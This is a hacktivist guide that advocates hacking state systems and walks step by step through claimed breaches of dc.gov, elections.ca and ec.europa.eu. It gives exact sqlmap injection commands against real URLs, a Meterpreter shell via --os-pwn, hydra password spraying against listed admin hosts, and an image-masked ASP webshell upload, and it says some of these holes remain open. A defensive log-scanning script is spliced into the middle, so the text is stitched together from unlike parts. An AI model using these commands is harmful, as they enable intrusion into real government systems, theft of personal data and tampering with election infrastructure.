reciprocal of revolutionary researches against state, capital and police

1E7A 095F AADE 7A90 C21D B657 0A9A 1D98 75AB 60F9

1312work@riseup.net

hacking gives the underdog a chance to fight and win
[Hack Back]

Intro

State infrastructure is not impenetrable, because many of the services and technologies it relies on cannot be replaced. States depend on an outsourced workforce to improve those services, which introduces bugs and flaws and opens opportunities for their adversaries to infiltrate.

Today we will talk about the vulnerabilities that states have left open and continue to leave open despite their attempts at improving surface security. Gaining access to state infra isn't difficult, because their SOC often doesn't have the power to manage and plug every security hole; maintaining access is the hard part, due to the number of defenses inside their infra. We will also briefly talk about that. The reason this type of vuln is the topic, rather than phishing or any higher form of advanced persistent threat (APT), is that not every hacker can pull off a clean APT infiltration; moreover, the infra required to maintain access (C2, bounce and hop boxes, etc.) is beyond most hacktivists' budget, skill and time. This guide is about using what is already available to breach their systems. Spear-phishing would be great, but we will go in-depth on it in a future guide.

Tools and Techniques

VM/Live

  • Parrot OS : You need a sandboxed environment to perform your operation. Parrot OS is preferred over Kali because of its pre-configured sandbox and Tor mode, meaning that you can run it as a VM or live and still be able to anonymize your connection. When running live, you can configure an encrypted persistent partition to save your results.

Discovery

  • Tor Browser : You will need this to inspect content or gather resources for research related to your target(s).
  • Zed Attack Proxy : ZAP lets you inspect, crawl and intercept site content live to find web app vulns.
  • Burp Suite : Similar to ZAP, both are web app proxies, but Burp Suite is needed whenever ZAP fails to discover a vuln.
  • nmap : flagship network scanner to enumerate services, OS and ports
  • sifter : host OSINT
  • photon : another host OSINT
  • nikto : web app scanner
  • skipfish : automated web app scanner
  • wpscan : WordPress scanner
  • joomscan : Joomla scanner
  • uniscan : multipurpose scanner
  • gobuster : directory scanner
  • dirble : fast directory scanner
  • ATSCAN : multipurpose dork scanner and exploiter
  • INURLBR : multipurpose dork scanner and exploiter with over 20 different search engines.
  • Ding.rb : lightweight dorker that returns quick results
  • Bingoo : Bing & Google dork scanner; while its dork results are usually poor, it can be used to quickly process a dork list
  • recon-ng : OSINT framework
  • whatweb : web app service enumeration tool
  • proxychains : proxy tunnel

Exploitation

  • sqlmap : SQL injection Swiss army knife
  • atlas : tamper suggester for sqlmap
  • bbqsql : Blind SQL injection tool
  • fimap : File inclusion tool
  • commix : command injection tool
  • meterpreter : Metasploit backdoor management
  • vulnx : Auto shell injection for CMS like Joomla, WP and Drupal
  • hydra : web password cracker
  • nekobot : auto exploiter with 500+ exploits and 2000+ shells
  • weevely : basic PHP web shell
  • webacoo : Web backdoor cookie script kit

Real Examples

The author believes that sharing real incidents from their history makes for better examples in this guide, and will provide a brief walkthrough of the techniques and tools used in the breaches. Some of these vulns are still exploitable.

2013 - DC.gov

http://app.ocp.dc.gov/RUI/information/award/award_detail.asp?award_id=9887

dc.gov is the Washington DC government website for DC local administration; note that this is not the site for the federal government. The author discovered the SQLi with Ding while searching for .gov vulns.

The ding command used:

$ ruby ding2.rb --dork "inurl:asp?id" --country-code dc.gov --level 3

Or with short flags

$ ruby ding2.rb -d "inurl:asp?id" -c dc.gov -L 3

This queries the dork for any dc.gov URL matching asp?id and runs test level 3, which is the single quote + blind injection test:

    -L, --level
	Level of Tests to Perform with Search
	0 => Run Single Quote Injection Test (default)
	1 => Run Blind Injection Test
	2 => Run /etc/passwd LFI Injection Test
	3 => Single Quote + Blind Test
	4 => Single Quote + /etc/passwd Test
	5 => Perform All Tests

When the result was parsed and the blind injection test came back positive, the author plugged it into sqlmap and ran this command:

$ sqlmap --tor --check-tor --random-agent --keep-alive --skip-waf --technique=BEUS -u "http://app.ocp.dc.gov/RUI/information/award/award_detail.asp?award_id=9887" --batch

This runs sqlmap over Tor and checks that Tor is actually in use, randomizes the user agent, uses persistent HTTP connections and skips WAF detection. The techniques were B for Blind injection, E for Error-based, U for Union and S for Stacked (stack-based) injection; stacked injection is ideal for shelling the backend database if exploitable.

On --skip-waf: while a WAF makes exploitation harder, it's not the end of the world, because many WAFs are misconfigured and easily bypassed with sqlmap's --tamper option. You can also increase --level and --risk for more aggressive exploitation. ASP usually means a Microsoft database backend such as MSSQL or MS Access. If sqlmap does not detect the DBMS with the default options, you can force it with --dbms, e.g. --dbms=mssql or --dbms=access.

sqlmap discovered that the backend is MSSQL, vulnerable to Blind, Error-based and Stacked injection. While dumping the database would have been fun, the author went straight for stacked injection, because backdooring the server gains further access to the network. The problem with MSSQL is that you are unlikely to have access to neighboring databases unless you have DBA privileges; you can use --is-dba to check whether the current user is the DBA.

$ sqlmap --tor --check-tor --random-agent --keep-alive --skip-waf --technique=BEUS -u "http://app.ocp.dc.gov/RUI/information/award/award_detail.asp?award_id=9887" --os-pwn

--os-pwn prompts for the options of an OOB shell, Meterpreter or VNC. The problem with an OOB shell is that it is easily detectable, while VNC is unstable if your target's connection is weak. The author went with a Meterpreter bind shell.

2015 - Elections.ca

http://elections.ca/res/eim/article_search/article.asp?id=132&lang=e&frmPageSize=

Elections.ca is the main Canadian federal election website for voter registration and the online voting system. This breach was done one month before the 2015 federal election. The vuln was discovered through atscan, hosts were enumerated with recon-ng, it was exploited with sqlmap and logins were tested with hydra. Like all adventures, the author began by researching the target through basic enumeration.

The author used whatweb to enumerate the type of web app service used on the target:

$ whatweb -v -a 3 elections.ca

The target runs ASP.NET, which means the back-end is MS Access. Next the author ran an atscan dork scan for vulns:

$ atscan --dork dorks.txt --level 3 --sql --target elections.ca

The dorks.txt contains:

asp?id=
asp?lang=
asp?cat=
aspx?id=
aspx?lang=
aspx?cat=

The results came back positive for Blind injection. Let's do the sqlmap magic:

$ sqlmap --tor --check-tor --random-agent --keep-alive --skip-waf --technique=EU -u "http://elections.ca/res/eim/article_search/article.asp?id=132&lang=e&frmPageSize=" --batch -p id

This command is a bit different from the first example: because there are multiple parameters, we need to specify one of them with the -p flag. Another difference is that the techniques are reduced to Error-based and Union, because Blind and Stacked injection are very loud and will trigger an IDS, which any critical government infra like an election server must have.

The parameter turned out to be vulnerable to Error-based injection. Next we need to dump the table. Note that in Access you cannot enumerate databases the way you can with other DBMSs, so we need to specify the table.

$ sqlmap --tor --check-tor --random-agent --keep-alive --skip-waf --technique=EU -u "http://elections.ca/res/eim/article_search/article.asp?id=132&lang=e&frmPageSize=" -p id --threads 7 --no-cast --common-tables --unstable

We set --threads to 7; threads here means the maximum number of concurrent connections. --no-cast disables sqlmap's casting mechanism; this increases dumping time but reduces the noise of the queries if an IDS/WAF is blocking them. --common-tables enumerates against the list of known table names that sqlmap ships with; you can use a custom list when it prompts you during the operation. --unstable adjusts options for an unstable connection. We also removed --batch to select options manually.

The Users table came up. We need to dump it, so we specify --dump and -T for the target table:

$ sqlmap --tor --check-tor --random-agent --keep-alive --skip-waf --technique=EU -u "http://elections.ca/res/eim/article_search/article.asp?id=132&lang=e&frmPageSize=" -p id --threads 7 --no-cast -T Users --dump

When the hashes are dumped, sqlmap will ask you if you want to crack the passwords; you can crack them with the default wordlist or a custom one. hashes.org has massive pre-cracked wordlists in plaintext that you can download, or you can use the password lists from SecLists in Parrot OS (the probable lists are recommended). Once you have the passwords in plaintext you can grep them out into passwords.txt, and grep the usernames out into logins.txt.

Once we have the logins we need to find the admin page. The problem is that using anything like dirbuster is very loud and would definitely trigger a SOC investigation, so we need something super low-key. At the time a new host enumeration technique had just come out: using certificate transparency (CT) logs to get all HTTPS-enabled hosts issued under the same CA. recon-ng had added a module for it.

(Note: because recon-ng has gone through several confusing CLI overhauls over the past 5 years, the author decided to stick to the latest options)

Once recon-ng is launched, you need to load the CT module, set the source and run it with these options:

modules load certificate_transparency

options set source elections.ca

run

It will print something like this:

------------
ELECTIONS.CA
------------
[*] Country: None
[*] Host: evault.elections.ca
[*] Ip_Address: None
[*] Latitude: None
[*] Longitude: None
[*] Notes: None
[*] Region: None
[*] --------------------------------------------------
[*] Country: None
[*] Host: evaults1.elections.ca
[*] Ip_Address: None
[*] Latitude: None
[*] Longitude: None
[*] Notes: None
[*] Region: None
[*] --------------------------------------------------
[*] Country: None
[*] Host: certauth.sts.elections.ca
[*] Ip_Address: None
[*] Latitude: None
[*] Longitude: None
[*] Notes: None
[*] Region: None
[*] --------------------------------------------------
[*] Country: None
[*] Host: enterpriseregistration.elections.ca
[*] Ip_Address: None
[*] Latitude: None
[*] Longitude: None
[*] Notes: None
[*] Region: None
[*] --------------------------------------------------

-------
SUMMARY
-------

Extract the hosts into hosts.txt. All the admin pages are:

admin.elections.ca
admin.preprod.elections.ca
admin.test.elections.ca
cce-admin.elections.ca
selection-admin.elections.ca
tapadmin.preprod.elections.ca
tapadminapp.preprod.elections.ca
www.selection-admin.elections.ca

We need to test all the logins, but time is running out and we can't do it manually. So we test all the logins against the admin host list with hydra, using this command:

$ hydra -L logins.txt -P passwords.txt -M hosts.txt http-post-form "/login.asp:username=^USER^&password=^PASS^&Login=Login:Login failed" -V

Once hydra is finished, we can use the correct logins from Tor Browser and find the image upload form to backdoor with an ASP webshell from the webshells collection of the BlackArch git repository. While you cannot upload a plain ASP shell, what you can do is inject an image header into the webshell file and mask it as an image file.

Once you get the shell up, you can test it by browsing to something like elections.ca/shell.asp and running the command whoami.

Unfortunately, the author only got this far, because while they were attempting to backdoor the server with a bind shell the breach was discovered and the SQLi vuln was quickly closed by the SOC. While the webshell was still up at the time, the author halted any attempt to access the server and cleaned house.

2019 - ec.europa.eu

http://ec.europa.eu/regional_policy/blog/detail.cfm?id=15%27

This last example features the real log of the breach.

ec.europa.eu is the main website of the European Commission, the executive branch of the European Union. The author used ding to discover vulns and exploited them with sqlmap.

Like all fun camping trips, the author began with a dork scanner. To scan for the target:

$ ruby ding2.rb -d "inurl:cfm?id" -c ec.europa.eu --level 3

When the target shows up in the output, we can use sqlmap to inject:

$ sqlmap --random-agent --skip-waf --keep-alive -u http://ec.europa.eu/regional_policy/blog/detail.cfm?id=15 --technique=EB --no-cast --tor --check-tor --batch --threads 5
sqlmap identified the following injection point(s) with a total of 85 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=15 AND 7941=7941

    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)
    Payload: id=15 AND 3301=CTXSYS.DRITHSX.SN(3301,(CHR(113)||CHR(112)||CHR(120)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (3301=3301) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(98)||CHR(120)||CHR(113)))
---
web application technology: Apache 2.2.29
back-end DBMS: Oracle
$ sqlmap --random-agent --skip-waf --keep-alive -u http://ec.europa.eu/regional_policy/blog/detail.cfm?id=15 --technique=E --no-cast --tor --check-tor --batch --threads 7 --dbs
available databases [7]:
[*] CTXSYS
[*] EXFSYS
[*] PATROL_SETUP
[*] REGADMIN
[*] SYS
[*] SYSTEM
[*] XDB
$ sqlmap --random-agent --skip-waf --keep-alive -u http://ec.europa.eu/regional_policy/blog/detail.cfm?id=15 --technique=E --no-cast --tor --check-tor --batch --threads 7 --tables
$ sqlmap --random-agent --skip-waf --keep-alive -u http://ec.europa.eu/regional_policy/blog/detail.cfm?id=15 --technique=E --no-cast --tor --check-tor --batch --threads 7 -D REGADMIN -T T_PERSON --columns
Database: REGADMIN
Table: T_PERSON
[13 columns]
+--------------+----------+
| Column       | Type     |
+--------------+----------+
| CITY         | VARCHAR2 |
| COUNTRY      | VARCHAR2 |
| EMAIL        | VARCHAR2 |
| FAX          | VARCHAR2 |
| FNAME        | VARCHAR2 |
| GENDER       | VARCHAR2 |
| ID_PERSON    | NUMBER   |
| LNAME        | VARCHAR2 |
| NUM          | VARCHAR2 |
| ORGANISATION | VARCHAR2 |
| PHONE        | VARCHAR2 |
| STREET       | VARCHAR2 |
| ZIP          | VARCHAR2 |
+--------------+----------+
$ sqlmap --random-agent --skip-waf --keep-alive -u http://ec.europa.eu/regional_policy/blog/detail.cfm?id=15 --technique=E --no-cast --tor --check-tor --batch --threads 7 -D REGADMIN -T T_PERSON -C EMAIL --dump
(Note: many more emails were dumped, but the author didn't want to clutter up this post)
$ sqlmap --random-agent --skip-waf --keep-alive -u http://ec.europa.eu/regional_policy/blog/detail.cfm?id=15 --technique=E --no-cast --tor --check-tor --batch --threads 7 -D REGADMIN -T VD_USERS,TBL_USERS --dump

The author then used the --dump-all flag to completely dump the databases:

$ sqlmap --random-agent --skip-waf --keep-alive -u http://ec.europa.eu/regional_policy/blog/detail.cfm?id=15 --technique=E --no-cast --tor --check-tor --batch --threads 10 --dump-all

However, because the author couldn't find the admin page at the time, they sought help from a very wise Sabo-Tabby.

Back to the target: the author then ran the CT module from recon-ng, exported the host list and grepped out the login hosts:

de-mw-eulogin.tech.ec.europa.eu
secureadmin.enterprise-europe-network.ec.europa.eu
vpn-bx.ec.europa.eu
vpn-lu.ec.europa.eu
vpn.ec.europa.eu
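From the defender's side, the probes shown in the log above (the id=15%27 quote test, the boolean AND 7941=7941 payload and the Oracle CTXSYS.DRITHSX.SN error-based payload), the /etc/passwd LFI test in ding's level table, and the UNION and stacked techniques from the DC.gov section all leave recognisable traces in the web server access log. The following is an added example, not the author's code, that URL-decodes every query parameter in constructed Apache combined-format log lines, tags the probe type per request, and summarises the techniques seen per source IP; the log lines, IPs and signature names are constructed for the demonstration, and several distinct probe types from one IP in quick succession is the fingerprint of an automated scanner.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Apache/nginx "combined" access log line:
#   ip - - [time] "METHOD path HTTP/x" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Probe signatures, matched against the URL-decoded, lower-cased parameter value.
# They mirror the tests discussed on the page: ding's single-quote and /etc/passwd
# LFI levels, and sqlmap's B (boolean blind), E (error-based), U (union) and
# S (stacked) techniques. Signature names are our own labels.
SIGNATURES = {
    "quote-probe":   re.compile(r"'\s*$"),
    "boolean-blind": re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+"),
    "error-oracle":  re.compile(r"ctxsys\.drithsx\.sn"),
    "union":         re.compile(r"\bunion\s+(all\s+)?select\b"),
    "stacked":       re.compile(r";\s*(select|insert|update|delete|exec|waitfor|declare)\b"),
    "lfi-probe":     re.compile(r"(\.\./){2,}|/etc/passwd"),
}

# Constructed sample log (not any real server's log). The paths reuse the URL
# shapes discussed on the page; the IPs come from documentation ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2019:14:02:11 +0000] "GET /regional_policy/blog/detail.cfm?id=15 HTTP/1.1" 200 8421 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2019:14:02:12 +0000] "GET /regional_policy/blog/detail.cfm?id=15%27 HTTP/1.1" 500 612 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2019:14:02:13 +0000] "GET /regional_policy/blog/detail.cfm?id=15%20AND%207941%3D7941 HTTP/1.1" 200 8421 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2019:14:02:14 +0000] "GET /regional_policy/blog/detail.cfm?id=15%20AND%203301%3DCTXSYS.DRITHSX.SN%283301%2C%28CHR%28113%29%29%29 HTTP/1.1" 500 1044 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Mar/2019:14:03:01 +0000] "GET /RUI/information/award/award_detail.asp?award_id=9887%3BWAITFOR%20DELAY%20%270%3A0%3A5%27-- HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Mar/2019:14:03:02 +0000] "GET /RUI/information/award/award_detail.asp?award_id=9887%20UNION%20ALL%20SELECT%20NULL%2CNULL-- HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Mar/2019:14:03:03 +0000] "GET /index.asp?page=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 404 210 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Mar/2019:14:04:00 +0000] "GET /res/eim/article_search/article.asp?id=132&lang=e&frmPageSize= HTTP/1.1" 200 3300 "-" "Mozilla/5.0"
"""


def decode_params(path):
    """Split the request path into (name, value) pairs. parse_qsl decodes once;
    the extra unquote_plus also catches double-encoded payloads (%2527 -> %27 -> ')."""
    query = urlsplit(path).query
    return [(k, unquote_plus(v)) for k, v in parse_qsl(query, keep_blank_values=True)]


def classify(value):
    """Names of the probe signatures present in one decoded parameter value."""
    v = value.lower()
    return [name for name, rx in SIGNATURES.items() if rx.search(v)]


def scan(lines):
    """Scan access log lines. Returns (findings, hits_per_ip): one finding per
    request parameter that carries a probe, and a Counter of hits by source IP."""
    findings, per_ip = [], Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skipped, not treated as clean
        for name, value in decode_params(m["path"]):
            hits = classify(value)
            if hits:
                findings.append({"ip": m["ip"], "ts": m["ts"], "param": name,
                                 "techniques": hits, "status": int(m["status"])})
                per_ip[m["ip"]] += 1
    return findings, per_ip


def techniques_by_ip(findings):
    """Sorted set of probe types seen per source IP."""
    seen = {}
    for f in findings:
        seen.setdefault(f["ip"], set()).update(f["techniques"])
    return {ip: sorted(t) for ip, t in seen.items()}


if __name__ == "__main__":
    findings, per_ip = scan(SAMPLE_LOG.splitlines())
    for ip, techs in techniques_by_ip(findings).items():
        print(f"{ip}: {per_ip[ip]} probe(s), techniques={techs}")
```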

End Words

The art of exploitation does not come from some college or institution. It comes from your persistence, perseverance, thirst for curiosity and resistance against state and capital.

The power is in your hands, you can unschool and hack at the same time, start anywhere. Hack for the power of people.

When we speak truth to power we are ignored at best and brutally suppressed at worst
[Jeremy Hammond]